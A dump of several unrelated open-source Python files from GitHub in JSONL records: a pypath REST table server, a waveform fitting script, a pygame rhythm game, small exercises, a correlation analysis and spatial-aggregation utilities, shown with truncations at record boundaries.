tbl,\n license = license,\n res_col = 'source',\n simple = True,\n )\n\n\n @classmethod\n def _filter_by_license_intercell(cls, tbl, license):\n\n return cls._filter_by_license(\n tbl = tbl,\n license = license,\n res_col = 'database',\n simple = True,\n )\n\n\n @staticmethod\n def _filter_by_license(\n tbl,\n license,\n res_col,\n simple = False,\n prefix_col = None,\n ):\n\n def filter_resources(res):\n\n res = {\n r for r in res\n if res_ctrl.license(r).enables(license)\n }\n\n composite = [\n r for r in res\n if res_ctrl.license(r).name == 'Composite'\n ]\n\n if composite:\n\n composite_to_remove = {\n comp_res\n for comp_res in composite\n if not res_ctrl.secondary_resources(comp_res, True) & res\n }\n\n res = res - composite_to_remove\n\n return res\n\n\n if license == LICENSE_IGNORE or tbl.shape[0] == 0:\n\n return tbl\n\n res_ctrl = resources_mod.get_controller()\n\n _res_col = getattr(tbl, res_col)\n\n if simple:\n\n bool_idx = [\n res_ctrl.license(res).enables(license)\n for res in _res_col\n ]\n\n else:\n\n _set_res_col = tbl.set_sources\n\n _res_to_keep = [\n filter_resources(ress)\n for ress in _set_res_col\n ]\n\n with ignore_pandas_copywarn():\n\n tbl[res_col] = [\n ';'.join(sorted(ress))\n for ress in _res_to_keep\n ]\n\n if prefix_col:\n\n _prefix_col = getattr(tbl, prefix_col)\n\n _new_prefix_col = [\n\n ';'.join(sorted(\n pref_res\n for pref_res in pref_ress.split(';')\n if (\n pref_res.split(':', maxsplit = 1)[0] in\n _res_to_keep[i]\n )\n ))\n\n if isinstance(pref_ress, common.basestring) else\n\n pref_ress\n\n for i, pref_ress in enumerate(_prefix_col)\n ]\n\n with ignore_pandas_copywarn():\n\n tbl[prefix_col] = _new_prefix_col\n\n bool_idx = [bool(res) for res in tbl[res_col]]\n\n tbl = tbl.loc[bool_idx]\n\n return tbl\n\n\n @classmethod\n def _serve_dataframe(cls, tbl, req):\n\n if b'limit' in req.args:\n\n limit = req.args[b'limit'][0].decode('utf-8')\n\n if limit.isdigit():\n\n limit = int(limit)\n tbl = tbl.head(limit)\n\n if b'format' in req.args and req.args[b'format'][0] == b'json':\n\n data_json = tbl.to_json(orient = 'records')\n # this is necessary because in the data frame we keep lists\n # as `;` separated strings but in json is nicer to serve\n # them as lists\n data_json = json.loads(data_json)\n\n for i in data_json:\n\n for k, v in iteritems(i):\n\n if k in cls.list_fields:\n\n i[k] = (\n [\n (\n int(f)\n if (\n k in cls.int_list_fields and\n f.isdigit()\n ) else\n f\n )\n for f in v.split(';')\n ]\n if isinstance(v, common.basestring) else\n []\n )\n\n return json.dumps(data_json)\n\n else:\n\n return tbl.to_csv(\n sep = '\\t',\n index = False,\n header = bool(req.args[b'header']),\n chunksize = 2e5,\n )\n\n\n @staticmethod\n def _args_set(req, arg):\n\n arg = arg.encode('utf-8')\n\n return (\n set(req.args[arg][0].decode('utf-8').split(','))\n if arg in req.args\n else set()\n )\n\n\nclass Rest(object):\n\n def __init__(\n self,\n port,\n serverclass = TableServer,\n start = True,\n **kwargs\n ):\n \"\"\"\n Runs a webserver serving a `PyPath` instance listening\n to a custom port.\n\n Args\n -----\n :param int port:\n The port to listen to.\n :param str serverclass'\n The class implementing the server.\n :param **kwargs:\n Arguments for initialization of the server class.\n \"\"\"\n\n self.port = port\n _log('Creating the server class.')\n self.server = serverclass(**kwargs)\n _log('Server class ready.')\n\n if start:\n\n _log('Starting the twisted server.')\n self.start()\n\n def start(self):\n\n self.site = TwistedWebSite(self.server)\n _log('Site created.')\n twisted_listen_tcp(self.port, self.site)\n _log('Server going to listen on port %u from now.' % self.port)\n twisted_run()\n","repo_name":"saezlab/pypath","sub_path":"pypath/omnipath/server/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":78989,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"37"} +{"seq_id":"42316947714","text":"#!/usr/bin/env python\n'''\nRoot to numpy converter (from file to file).\n\nTruncates the waveform to desired width. Applies the fit\n\n'''\n\nt_offset = 6.17742\n\ntemplate = None\nvec = None\n\n\n###\ndef tempfit(x, *par):\n w = x - par[1]\n return par[0]*np.interp(w, vec, template[:,1], left=0.0, right=0.0) + par[2]\n\n###################################\nimport uproot3\nimport numpy as np\nfrom numpy import loadtxt\n\nimport scipy\nfrom scipy.optimize import curve_fit\n\nimport argparse\n###################################\n# Input normalization\nnorm = np.array([4000, 16, 2000])\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"-i\", \"--infile\", type=str, help=\"Input ROOT file\", default='')\nparser.add_argument(\"-o\", \"--outfile\", type=str, help=\"Output numpy file\", default='')\n\nparser.add_argument(\"-T\", \"--tmplfile\", type=str, help=\"Fit template file\", default='template.csv')\n\nparser.add_argument(\"-N\", \"--entries\", type=int, help=\"Number of entries\", default=0)\nparser.add_argument(\"-c\", \"--channel\", type=int, help=\"Channel\", default=0)\n\n\nparser.add_argument(\"-t\", \"--threshold\",type=float, help=\"threshold\", default=0.0)\nparser.add_argument(\"-r\", \"--r2\", type=float, help=\"R2 threshold\", default=0.0)\n\nparser.add_argument(\"-f\", \"--normfactor\", type=float, help=\"Normalization factor\",default=1.0)\n\nparser.add_argument(\"-v\", \"--verbose\", action='store_true', help=\"Verbose mode\")\nparser.add_argument(\"-z\", \"--zip\", action='store_true', help=\"Store compressed\")\nparser.add_argument(\"-s\", \"--short\", action='store_true', help=\"Shorten the waveform (downsample)\")\nparser.add_argument(\"-w\", \"--window\", action='store_true', help=\"Narrow window the waveform\")\nparser.add_argument(\"-n\", \"--normalize\",action='store_true', help=\"Normalize input\")\nparser.add_argument(\"-p\", \"--peaktime\", action='store_true', help=\"Strict cut on peak time\")\n\nparser.add_argument(\"-d\", \"--debug\", action='store_true', help=\"Debug mode\")\n\n###################################\nargs = parser.parse_args()\n\ninfile = args.infile\noutfile = args.outfile\n\ntmplfile = args.tmplfile\n\nentries = args.entries\nverbose = args.verbose\n\ntreename = 'trainingtree'\nbranchname = 'waveform'\n\nchannel = args.channel\nthreshold = args.threshold\n\nnormalize = args.normalize\nnrm = args.normfactor\n\n#####################################\n\nnp.set_printoptions(precision=3, linewidth=80)\n\nif(infile==''):\n print('Please specify a valid input file name')\n exit(-1)\nfile = uproot3.open(infile)\n\n\nif verbose: print(f'''Will attempt to use the template file \"{tmplfile}\".''')\n\ntry:\n template = loadtxt(tmplfile, delimiter=',')\nexcept:\n print(\"Problem with reading template file, exiting\")\n exit(-1)\n\nif verbose:\n print(f'''Template dimensions: {template.shape}''')\n print(f'''Opened file \"{infile}\", will use tree \"{treename}\"''')\n\n\n# Translate the template \"x\" axis\nvec = template[:,0] - t_offset\n\ndir = file[treename]\nbranch = dir[branchname]\nNentries = branch.numentries\n\nN=Nentries if entries==0 else min(entries,Nentries)\n\nif verbose: print(f'''Will process {N} entries out of total {Nentries}''')\n\nX = branch.array()\ndims = X.shape\nif verbose : print(f'''Read an array: {dims}''')\n\nx = np.linspace(0, 31, 31, endpoint=False)\n\ncnt_bad, cnt_out, cnt_small, first, output_array = 0, 0, 0, True, None\n\nif normalize:\n param_bounds=([0.01, 3.0, 0.3],[10.0, 19.0, 2.5])\nelse:\n param_bounds=([20.0, 3.0, 1100.0],[14000.0, 25.0, 2400.0])\n\n\n\nindices = range(3, 31, 3)\n\nfor i in range(N): # loop over the data sample\n x = np.linspace(0, 31, 31, endpoint=False) # Keep it here!\n if (verbose and (i %100)==0 and i!=0): print(f'''Processed: {i} Percentage bad: {float(cnt_bad)/float(i)}''')\n\n frame = X[i] # select a row\n wave = frame[channel][0:31] # select waveform, 31 bin\n\n if args.short:\n wave = np.take(wave, indices)\n x = np.arange(3, 31, 3)\n\n\n maxindex = np.argmax(wave)\n maxval = wave[maxindex]\n \n if args.short: maxindex = x[maxindex]\n\n if args.window:\n if maxindex>25 or maxindex<5: # filter out outliers\n cnt_out+=1\n continue\n\n selection = np.arange(maxindex-4, maxindex+6)\n maxindex = x[maxindex]\n wave = np.take(wave, selection)\n x = selection\n\n\n if args.peaktime: # strict timing selection\n if maxindex>15 or maxindex<9: # filter out outliers\n cnt_out+=1\n continue\n \n ped_guess = np.average(wave[0:5]) # ped_guess = 1580 NB. Good guess for channel 27\n\n # -------------------------------------------------------------------------\n # Core fit:\n\n if normalize:\n wave = wave/nrm\n maxval = maxval/nrm\n ped_guess = ped_guess/nrm\n \n amp = float(maxval-ped_guess)\n\n\n if amp song_length+1:\r\n break # 歌曲结束\r\n\r\n if music_state and not music_started and now_time > 0:\r\n pygame.mixer.music.play() # 开始播放歌曲\r\n music_started = True\r\n\r\n if now_time > 0:\r\n # 以颜色形式保存连击数历史\r\n combo_prog = combo/len(notes)\r\n if combo_prog < 0.5:\r\n k = 1-(1-combo_prog*2)**2\r\n t = int(k*255)\r\n combo_his[int(1000*now_time/song_length)\r\n ] = (255-t, t, 255-t) # 紫-绿\r\n else:\r\n k = combo_prog*2-1\r\n t1 = int(k*255)\r\n t2 = int(k*40)\r\n combo_his[int(1000*now_time/song_length)\r\n ] = (t1, 255-t2, 0) # 绿-金\r\n\r\n # Miss 判定和 Autoplay\r\n for note in notes:\r\n if autoplay and now_beat > note.time and not note.click:\r\n note.clicktime = note.time\r\n play_sound[note.type]()\r\n note.click = 1\r\n c1 += 1\r\n combo += 1\r\n score += 10000 / len(notes)\r\n elif (now_beat-note.time)*beat > 0.35 and not note.click:\r\n note.click = -2\r\n c4 += 1\r\n combo = 0\r\n\r\n def show():\r\n # 显示谱面\r\n show_bgpic()\r\n for note in notes:\r\n if -20 < getlinepos(now_beat)-10-(note.time-now_beat)*note.direction*getspeed(now_beat) < 600:\r\n if not note.click:\r\n # 显示 Note\r\n rect = pygame.Rect(\r\n 110*note.pos+10, getlinepos(now_beat)-10-(note.time-now_beat)*note.direction*getspeed(now_beat), 100, 20)\r\n if note.multi:\r\n # 显示多押提示\r\n rect2 = pygame.Rect(\r\n rect.left-2, rect.top-2, 104, 24)\r\n pygame.draw.rect(screen, (255, 255, 200),\r\n rect2, border_radius=5)\r\n pygame.draw.rect(screen, ((100, 150, 200), (200, 150, 100),\r\n (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)))[note.type],\r\n rect, border_radius=5)\r\n # 显示数字提示\r\n text_num = font.render(\r\n str(int(note.pos+1)), True, (255, 255, 0))\r\n rect_num = text_num.get_rect()\r\n rect_num.center = rect.center\r\n screen.blit(text_num, rect_num)\r\n if now_beat-note.clicktime < 0.5 and note.click in (-1, 1, 2):\r\n # 显示打击特效\r\n size = (\r\n max(0, now_beat-note.clicktime)/0.5)**0.5*100\r\n rect = pygame.Rect(0, 0, size, size)\r\n rect.center = (110*note.pos+60,\r\n getlinepos(now_beat))\r\n pygame.draw.rect(\r\n screen, colors[note.click], rect, 5)\r\n\r\n # 显示分割线\r\n if show_split_line:\r\n for i in range(10):\r\n pygame.draw.line(\r\n screen, (100, 100, 100), (i*110+5, 0), (i*110+5, 600), 3)\r\n\r\n # 显示判定线\r\n if c2+c3+c4 == 0:\r\n linecolor = 1\r\n elif c3+c4 == 0:\r\n linecolor = 2\r\n else:\r\n linecolor = -1\r\n pygame.draw.line(\r\n screen, colors[linecolor], (0, getlinepos(now_beat)), (1000, getlinepos(now_beat)), 5)\r\n\r\n # 显示进度条\r\n for i in range(list(combo_his.keys())[-1]+1):\r\n if i not in combo_his:\r\n combo_his[i] = combo_his[i-1]\r\n pygame.draw.line(\r\n screen, combo_his[i], (i, 0), (i, 5), 1)\r\n\r\n # 显示文字\r\n y = 600\r\n for i in reversed(song_name.split('\\n')):\r\n text_name = font.render(i, True, (255, 255, 255))\r\n rect_name = text_name.get_rect()\r\n rect_name.bottomleft = (0, y)\r\n screen.blit(text_name, rect_name)\r\n y -= 30\r\n text_score = font.render(\r\n f'{str(round(score)).zfill(5)} | Combo: {combo}'+' (Autoplay)'*autoplay, True, (255, 255, 255))\r\n rect_score = text_score.get_rect()\r\n rect_score.midbottom = (500, 600)\r\n screen.blit(text_score, rect_score)\r\n screen.blit(text_diff, rect_diff)\r\n\r\n def pause():\r\n # 暂停\r\n if music_state:\r\n pygame.mixer.music.pause()\r\n rect_replay.midtop = (500, rect_continue.bottom+10)\r\n rect_return.midtop = (500, rect_replay.bottom+10)\r\n screen.blit(text_pause_big, rect_pause_big)\r\n screen.blit(text_continue, rect_continue)\r\n screen.blit(text_replay, rect_replay)\r\n screen.blit(text_return, rect_return)\r\n pygame.display.update()\r\n clicked = False\r\n while not clicked:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n sys.exit()\r\n elif event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_x:\r\n return 1\r\n elif event.key == pygame.K_r:\r\n return 2\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n clicked = True\r\n for i in range(3, 0, -1):\r\n show()\r\n text_num_big = font_big.render(\r\n str(i), True, (255, 255, 255))\r\n rect_num_big = text_num_big.get_rect()\r\n rect_num_big.center = (500, 300)\r\n screen.blit(text_num_big, rect_num_big)\r\n pygame.display.update()\r\n time.sleep(1)\r\n if music_started:\r\n pygame.mixer.music.unpause()\r\n\r\n # 刷新谱面\r\n show()\r\n pygame.display.update()\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n # 关闭窗口,退出游戏\r\n sys.exit()\r\n elif event.type == pygame.WINDOWFOCUSLOST and not autoplay or event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\r\n # 窗口丢失焦点,暂停游戏\r\n t = pause()\r\n if t == 1: # 返回标题界面\r\n return\r\n elif t == 2: # 重玩\r\n return game()\r\n else:\r\n start_time = time.time()-now_time-2\r\n elif event.type == pygame.KEYDOWN and pygame.K_1 <= event.key <= pygame.K_9:\r\n # 按下数字键,打击音符\r\n if not autoplay:\r\n key = event.key-pygame.K_1\r\n for note in notes:\r\n delta = abs(now_beat-note.time)*beat # 打击误差/秒\r\n if delta <= 0.35 and not note.click and note.pos == key:\r\n # 有效打击\r\n note.clicktime = now_beat\r\n total_delta += now_beat-note.time\r\n play_sound[note.type]()\r\n if delta <= 0.08:\r\n # Perfect 判定\r\n note.click = 1\r\n c1 += 1\r\n combo += 1\r\n score += 10000 / len(notes) * \\\r\n (0.7+math.log(combo+1, c1+c2+c3+c4+1)*0.3)\r\n elif delta <= 0.2:\r\n # Good 判定\r\n note.click = 2\r\n c2 += 1\r\n combo += 1\r\n score += 10000 / len(notes)*(0.7 +\r\n math.log(combo+1, c1 + c2+c3+c4+1)*0.3)*(0.9-(delta-0.08)/0.12*0.3)\r\n else:\r\n # Bad 判定\r\n note.click = -1\r\n c3 += 1\r\n combo = 0\r\n break\r\n\r\n # 评级\r\n if len(notes) == c1:\r\n letter = 'AP'\r\n elif c3+c4 == 0:\r\n letter = 'FC'\r\n elif score >= 9000:\r\n letter = 'S'\r\n elif score >= 8000:\r\n letter = 'A'\r\n elif score >= 7000:\r\n letter = 'B'\r\n elif score >= 6000:\r\n letter = 'C'\r\n else:\r\n letter = 'Fail'\r\n\r\n # 显示结算界面\r\n show_bgpic()\r\n y = 50\r\n for i in song_name.split('\\n'):\r\n text_name_big = font_big.render(i, True, (255, 255, 255))\r\n rect_name_big = text_name_big.get_rect()\r\n rect_name_big.topleft = (50, y)\r\n screen.blit(text_name_big, rect_name_big)\r\n y = rect_name_big.bottom+10\r\n text_composer = font.render(song_composer, True, (255, 255, 255))\r\n rect_composer = text_composer.get_rect()\r\n rect_composer.topleft = (50, rect_name_big.bottom+10)\r\n text_diff = font.render(\r\n diff+' (Autoplay)'*autoplay, True, (255, 255, 255))\r\n rect_diff = text_diff.get_rect()\r\n rect_diff.topleft = (50, rect_composer.bottom+10)\r\n rect_return.bottomleft = (50, 550)\r\n rect_replay.bottomleft = (50, rect_return.top-10)\r\n screen.blit(text_name_big, rect_name_big)\r\n screen.blit(text_composer, rect_composer)\r\n screen.blit(text_diff, rect_diff)\r\n screen.blit(text_return, rect_return)\r\n screen.blit(text_replay, rect_replay)\r\n img_letter = pygame.image.load(\r\n os.path.join(Resources, letter+'.png'))\r\n rect_letter = img_letter.get_rect()\r\n rect_letter.midtop = (865, 50)\r\n text_score_big = font_big.render(\r\n str(round(score)).zfill(5), True, (255, 255, 255))\r\n rect_score_big = text_score_big.get_rect()\r\n rect_score_big.midtop = (865, rect_letter.bottom)\r\n screen.blit(img_letter, rect_letter)\r\n screen.blit(text_score_big, rect_score_big)\r\n for line in range(len(combo_his)//4):\r\n pygame.draw.line(\r\n screen, combo_his[line*4], (line+740, rect_score_big.bottom+10), (line+740, rect_score_big.bottom+25), 1)\r\n text_perfect = font.render(f'Perfect: {c1}', True, colors[1])\r\n rect_perfect = text_perfect.get_rect()\r\n rect_perfect.midtop = (865, rect_score_big.bottom+35)\r\n text_good = font.render(f'Good: {c2}', True, colors[2])\r\n rect_good = text_good.get_rect()\r\n rect_good.midtop = (865, rect_perfect.bottom+10)\r\n text_bad = font.render(f'Bad: {c3}', True, colors[-1])\r\n rect_bad = text_bad.get_rect()\r\n rect_bad.midtop = (865, rect_good.bottom+10)\r\n text_miss = font.render(f'Miss: {c4}', True, colors[-2])\r\n rect_miss = text_miss.get_rect()\r\n rect_miss.midtop = (865, rect_bad.bottom+10)\r\n text_total = font.render(\r\n f'Total: {len(notes)}', True, (255, 255, 255))\r\n rect_total = text_total.get_rect()\r\n rect_total.midtop = (865, rect_miss.bottom+10)\r\n text_delta = font.render(\r\n f'Delta: {round(total_delta/(c1+c2+c3)*1000) if c1+c2+c3 else 0}ms', True, (255, 255, 255))\r\n rect_delta = text_delta.get_rect()\r\n rect_delta.midtop = (865, rect_total.bottom+10)\r\n screen.blit(text_perfect, rect_perfect)\r\n screen.blit(text_good, rect_good)\r\n screen.blit(text_bad, rect_bad)\r\n screen.blit(text_miss, rect_miss)\r\n screen.blit(text_total, rect_total)\r\n screen.blit(text_delta, rect_delta)\r\n screen.blit(img_logo, rect_logo)\r\n pygame.display.update()\r\n\r\n # 等待用户操作\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n sys.exit()\r\n elif event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_x:\r\n return\r\n elif event.key == pygame.K_r:\r\n return game()\r\n\r\n game()\r\n","repo_name":"Lucker-Studio/Lucking-Legacy","sub_path":"Lucking-v1.0-Beta-13.py","file_name":"Lucking-v1.0-Beta-13.py","file_ext":"py","file_size_in_byte":32593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7361239778","text":"# def clac_sum(*args):\n# ax = 0\n# for n in args:\n# ax = ax + n\n# return ax\n\n# 调用此函数时返回的不是求和结果,而是求和函数\ndef lazy_sum(*args):\n def sum():\n ax = 0\n for n in args:\n ax = ax + n\n return ax\n return sum\n\nf = lazy_sum(1, 3, 5, 7, 9)\nl = f()\nprint(l)\n","repo_name":"yunyusha/xunxibiji","sub_path":"text/liaoxuefeng/fmakere.py","file_name":"fmakere.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25067301290","text":"t_mem = {}\ns_mem = {1: 1, 2: 1, 3: 1, 4: 2}\n\ndef s(n):\n \"Number of palindromes summing to n which do not contain 2\"\n if n in s_mem:\n return s_mem[n]\n else:\n result = 2 - (n % 2)\n if n % 2 == 1:\n i = 1\n while n - 2*i > 0:\n if i != 2:\n result += s(n-2*i)\n i += 1\n else:\n i = 1\n while n - 2*i > 0:\n if i != 2:\n result += s(n-2*i)\n i += 1\n s_mem[n] = result\n return result\n\ni = 44\nmod = 10**6\ntotal = pow(2, 22, mod)\ns_list = [s(i - 6), s(i - 4), s(i-2), s(i)]\nt = (total - s_list[-1]) % mod\nwhile t != 0:\n total = (total * 2) % mod\n s_list = s_list[1:] + [(s_list[0] + s_list[2] + s_list[3]) % mod]\n t = (total - s_list[-1]) % mod\n i += 2\nprint(i)\n","repo_name":"arnet95/Project-Euler","sub_path":"euler710.py","file_name":"euler710.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72695274987","text":"import pickle\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport pandas as pd\nfrom pandas.plotting import scatter_matrix\nfrom bnn.seed import bae_set_seed\n\nbae_set_seed(100)\n\nplt.style.use('ggplot')\n\ntotal_sensors = 17\nsensor_names = [\"ts1\",\"ts2\",\"ts3\",\"ts4\",\"vs1\",\"se\",\"ce\",\"cp\"]+[\"fs1\",\"fs2\"]+[\"ps1\",\"ps2\",\"ps3\",\"ps4\",\"ps5\",\"ps6\",\"eps1\"]\n\npickle_path=\"pickles/\"\ndata_raw = pickle.load(open(pickle_path+\"data_ft_resampled.p\", \"rb\" ) )\nx_train, x_test, x_ood, x_test_noise,x_test_drift, = data_raw['x_train'], data_raw['x_test'], data_raw['x_ood'], data_raw['x_test_noise'], data_raw['x_test_drift']\ny_train, y_test, y_ood = data_raw['y_train'], data_raw['y_test'], data_raw['y_ood']\n\ndef get_corr_data(x_data,label=\"train\"):\n #put into df\n x_flatten = x_ood.reshape(-1,17)\n df = pd.DataFrame(x_flatten)\n df.columns = sensor_names\n #correlation\n correlation_table = df.corr()\n print(correlation_table)\n plt.matshow(correlation_table)\n plt.xticks(range(len(df.columns)), df.columns)\n plt.yticks(range(len(df.columns)), df.columns)\n plt.colorbar()\n plt.show()\n plt.savefig(label+\"_correlation_table.png\")\n\n #save csv\n correlation_table.to_csv(label+\"_correlation_table.csv\")\n\n return correlation_table\n\nget_corr_data(x_train,\"healthy\")\nget_corr_data(x_ood,\"faulty\")\n\nfor num_sensor in range(len(x_test_noise)):\n for id_,noise_level in enumerate(('0', '5', '10', '15', '20', '25')):\n if num_sensor == 10:\n get_corr_data(x_test_noise[num_sensor][id_],\"noise\"+str(noise_level)+\"_sensor\"+str(num_sensor))\n\nfor num_sensor in range(len(x_test_drift)):\n for id_,drift_level in enumerate(('0', '5', '10', '15', '20', '25')):\n if num_sensor == 10:\n get_corr_data(x_test_drift[num_sensor][id_],\"drift\"+str(drift_level)+\"_sensor\"+str(num_sensor))\n\n\n#put into df\nx_flatten = x_ood.reshape(-1,17)\ndf = pd.DataFrame(x_flatten)\ndf.columns = sensor_names\n\n#plot correlation\nsensor_i1 =3\nsensor_i2 =1\nnum_sample=0\nplt.figure()\nplt.scatter(x_flatten[:,sensor_i1].flatten(),x_flatten[:,sensor_i2].flatten())\n\n\n#entire scatter matrix\n#very computational intensive\nplot_full_scatter = False\nif plot_full_scatter:\n plt.figure()\n scatter_matrix(df, figsize=(8, 8), diagonal='kde')\n plt.show()\n\n#correlation\ncorrelation_table = df.corr()\nprint(correlation_table)\nplt.matshow(correlation_table)\nplt.xticks(range(len(df.columns)), df.columns)\nplt.yticks(range(len(df.columns)), df.columns)\nplt.colorbar()\nplt.show()\nplt.savefig(\"correlation_table.png\")\n\n#save csv\ncorrelation_table.to_csv(\"correlation_table.csv\")\n\n","repo_name":"bangxiangyong/bae-drift-detection-zema-hydraulic","sub_path":"subanalysis/calc_correlation.py","file_name":"calc_correlation.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"561648677","text":"\"\"\"Functions to assist spatial grouping algorithms. \n\"\"\"\nimport warnings\nimport numpy as np\nfrom scipy.cluster import hierarchy\nfrom FINE.IOManagement.utilsIO import PowerDict\n\ntry:\n import geopandas as gpd\nexcept ImportError:\n warnings.warn(\n \"The package geopandas is not installed. Spatial aggregation cannot be used without it.\"\n )\n\n\ndef get_normalized_array(array):\n \"\"\"\n Normalizes the given matrix to [0,1].\n\n :param matrix: Matrix to be normalized\n :type matrix: np.ndarray\n\n :returns: Normalized matrix\n :rtype: np.ndarray\n \"\"\"\n\n norm_min, norm_max = 0, 1\n\n if np.max(array) == np.min(array):\n return np.ones(array.shape)\n\n return ((array - np.min(array)) / (np.max(array) - np.min(array))) * (\n norm_max - norm_min\n ) + norm_min\n\n\ndef preprocess_time_series(vars_dict):\n \"\"\"\n Preprocesses time series variables.\n\n :param vars_dict: For each key (variable name), the corresponding value is a dictionary. This dictionary\n consists of each component name and the corresponding xr.DataArray.\n - Dimensions of xr.DataArray - 'time', 'space'\n :type vars_dict: Dict[str, Dict[str, xr.DataArray]]\n\n :returns: processed_ts_dict - For each key (variable name), the corresponding value is a dictionary. This dictionary\n consists of each component name and the corresponding nomalized data matrix\n - Size of each matrix: n_timesteps * n_regions\n :rtype: Dict[str, Dict[str, np.ndarray]]\n \"\"\"\n\n processed_ts_dict = {}\n\n for var_name, var_dict in vars_dict.items():\n processed_ts_dict.update({var_name: {}})\n\n # For each component, Normalize the corresponding matrix. Add to resulting dict\n for comp_name, da in var_dict.items():\n norm_comp_matrix = get_normalized_array(da.values)\n\n processed_ts_dict.get(var_name).update({comp_name: norm_comp_matrix})\n\n return processed_ts_dict\n\n\ndef preprocess_1d_variables(vars_dict):\n \"\"\"\n Preprocesses 1-dimensional variables.\n\n :param vars_dict: For each key (variable name), the corresponding value is a dictionary. This dictionary\n consists of each component name and the corresponding xr.DataArray.\n - Dimensions of xr.DataArray - 'space'\n :type vars_dict: Dict[str, Dict[str, xr.DataArray]]\n\n :returns: processed_1d_dict - For each key (variable name), the corresponding value is a dictionary. This dictionary\n consists of each component name and the corresponding normalized data array\n - Size of each array: n_regions\n :rtype: Dict[str, Dict[str, np.ndarray]]\n \"\"\"\n\n processed_1d_dict = {}\n\n for var_name, var_dict in vars_dict.items():\n processed_1d_dict.update({var_name: {}})\n\n # For each component, normalize the corresponding matrix. Add to resulting dict\n for comp_name, da in var_dict.items():\n norm_comp_array = get_normalized_array(da.values)\n\n processed_1d_dict.get(var_name).update({comp_name: norm_comp_array})\n\n return processed_1d_dict\n\n\ndef preprocess_2d_variables(vars_dict):\n \"\"\"\n Preprocesses 2-dimensional variables.\n\n :param vars_dict: For each key (variable name), the corresponding value is a dictionary. This dictionary consists of\n each component name and the corresponding xr.DataArray.\n - Dimensions of xr.DataArray - 'space','space_2'\n :type vars_dict: Dict[str, Dict[str, np.ndarray]]\n\n :returns: processed_2d_dict - For each key (variable name), the corresponding value is a dictionary. This dictionary consists of\n each component name and the corresponding data normalized (between [0, 1]),\n converted to vector form, and translated to distance meaning.\n - Size of each data array: n_regions\n :rtype: Dict[str, Dict[str, np.ndarray]]\n\n .. note::\n For each variable-component pair:\n - a normalised matrix of n_regions * n_regions is obtained\n - The matrix is flattened to obtain it's vector form:\n [[0. 0.1 0.2]\n [0.1 0. 1. ] --> [0.1 0.2 1. ] (only the elements from upper or lower triangle\n [0.2 1. 0. ]] as the other is always redundant in a dist matrix )\n - Translate the matrix from connectivity (similarity) to distance (dissimilarity) : (1- connectivity vector)\n \"\"\"\n\n processed_2d_dict = {}\n\n for var_name, var_dict in vars_dict.items():\n processed_2d_dict.update({var_name: {}})\n\n # For each component...\n for comp_name, da in var_dict.items():\n ## Normalize the data\n norm_comp_matrix = get_normalized_array(da.values)\n\n ## Obtain the vector form of this symmetric connectivity matrix\n norm_comp_vector = hierarchy.distance.squareform(\n norm_comp_matrix, checks=False\n )\n\n ## Convert the value of connectivity (similarity) to distance (dissimilarity)\n norm_comp_vector = 1 - norm_comp_vector\n\n ## Add to resulting dict\n processed_2d_dict.get(var_name).update({comp_name: norm_comp_vector})\n\n return processed_2d_dict\n\n\ndef preprocess_dataset(xarray_dataset):\n \"\"\"\n Preprocesses xarray dataset.\n\n :param xarray_dataset: the xarray dataset that needs to be preprocessed\n :type xarray_dataset: xr.Dataset\n\n :returns: dict_ts, dict_1d, dict_2d - Dictionaries obtained from\n preprocess_time_series(),\n preprocess_1d_variables(),\n and preprocess_2d_variables(), respectively\n :rtype: Dict\n \"\"\"\n\n # STEP 0. Traverse all variables in the dataset, and put them in separate categories\n # NOTE: vars_ts, vars_1d, vars_2d -> dicts of variables and their corresponding dataArrays\n vars_ts = PowerDict()\n vars_1d = PowerDict()\n vars_2d = PowerDict()\n\n for comp_class, comp_dict in xarray_dataset.items():\n for comp, comp_ds in comp_dict.items():\n for varname, da in comp_ds.data_vars.items():\n ## Time series\n if varname[:3] == \"ts_\":\n vars_ts[varname][comp] = da\n\n ## 1d variables\n elif varname[:3] == \"1d_\":\n vars_1d[varname][comp] = da\n\n ## 2d variables\n elif varname[:3] == \"2d_\":\n vars_2d[varname][comp] = da\n\n # STEP 1. Preprocess Time Series\n processed_ts_dict = preprocess_time_series(vars_ts)\n\n # STEP 2. Preprocess 1d Variables\n processed_1d_dict = preprocess_1d_variables(vars_1d)\n\n # STEP 3. Preprocess 2d Variables\n processed_2d_dict = preprocess_2d_variables(vars_2d)\n\n return processed_ts_dict, processed_1d_dict, processed_2d_dict\n\n\ndef get_custom_distance(\n processed_ts_dict,\n processed_1d_dict,\n processed_2d_dict,\n n_regions,\n region_index_x,\n region_index_y,\n weights=None,\n):\n \"\"\"\n Calculates and returns a customized distance between two regions.\n This distance is based on residual sum of squares, and is defined for\n two regions 'm' and 'n' as:\n D(m, n) = D_ts(m, n) + D_1d(m, n) + D_2d(m, n)\n\n where,\n D_ts(m, n) is cumulative distance of all time series variables:\n Sum of square of the difference between the values\n - summed over all time stpes\n - summed over all time series variables\n\n D_1d(m, n) is cumulative distance of all 1d variables:\n Sum of square of the difference between the values\n - summed over all 1d variables\n\n D_2d(m, n) is cumulative distance of all 2d variables:\n Sum of square of (1 - value)\n - summed over all 2d variables\n\n (2d values define how strong the connection is between\n two regions. They are converted to distance meaning by\n subtracting in from 1).\n\n :param processed_ts_dict, processed_1d_dict, processed_2d_dict: Dictionaries obtained as a result of 